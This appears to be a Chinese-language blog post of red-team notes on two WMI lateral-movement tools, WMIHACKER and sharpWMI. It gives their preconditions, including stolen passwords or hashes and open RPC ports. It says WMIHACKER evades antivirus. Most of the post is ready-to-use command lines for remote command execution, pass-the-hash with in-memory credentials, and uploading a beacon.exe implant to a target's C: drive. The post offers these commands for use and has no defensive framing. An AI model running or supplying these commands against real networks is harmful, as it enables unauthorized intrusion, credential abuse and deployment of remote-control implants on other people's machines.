22.两个基于WMI的横向工具(WMIHACHER、sharpWMI)

一、利用条件:

    1、目标开启135、49154端口

2、拥有目标的凭证(明文账号密码、账号hash、内存有正确的凭证)

 

二、优缺点:

优点:不需要对方开启445端口

缺点:需要对方开启rpc,有些机器是不会开的

 

三、利用流程:

他们都是通过wmi执行命令,然后把结果存放在注册表,再去读取注册表的

 

 

四、WMIHACKER:

    常见的WMIEXEC、PSEXEC方式基本都被杀软拦截,可以试试WMIHACKER这个360弄出来的工具

 

1、参数:

22.两个基于WMI的横向工具(WMIHACHER、sharpWMI)

 

2、常用参数:

 

①cscript //nologo WMIHACKER_06.vbs /cmd 192.168.1.4 <user> <password> whoami 1

#末尾的1就是要让⼯具回显执⾏命令的结果的意思,如果是0就是不回显

22.两个基于WMI的横向工具(WMIHACHER、sharpWMI)

 

②说⼀下这个⼯具如何在pth或者make_token下⼯作

cscript //nologo WMIHACKER_06.vbs /cmd 192.168.1.4 - - whoami 1

只要账号密码位为-,那么就会直接使⽤内存的凭证去连接wmi并执⾏后⾯的操作

 

五、SHARPWMI:

SHARPWMI出自QAX-Team:https://github.com/QAX-A-Team/sharpwmi ,比较好用。这个要自己编译才是最新版本,release里面哪个exe不是最新版。

 

1 、SHARPWMI常用参数:

sharpwmi.exe 192.168.1.4 administrator 123 cmd whoami

sharpwmi.exe 192.168.1.4 administrator 123 upload beacon.exe c:\beacon.exe

sharpwmi.exe pth 192.168.1.4 cmd whoami

sharpwmi.exe pth192.168.1.4 upload beacon.exe c:\beacon.exe

 

上传是通过poweshell的

 

上一篇:ARM嵌入式学习笔记 - 烧写系统(基于iTOP4412开发板)


下一篇:[笔记]Windows核心编程《十七》内存映射文件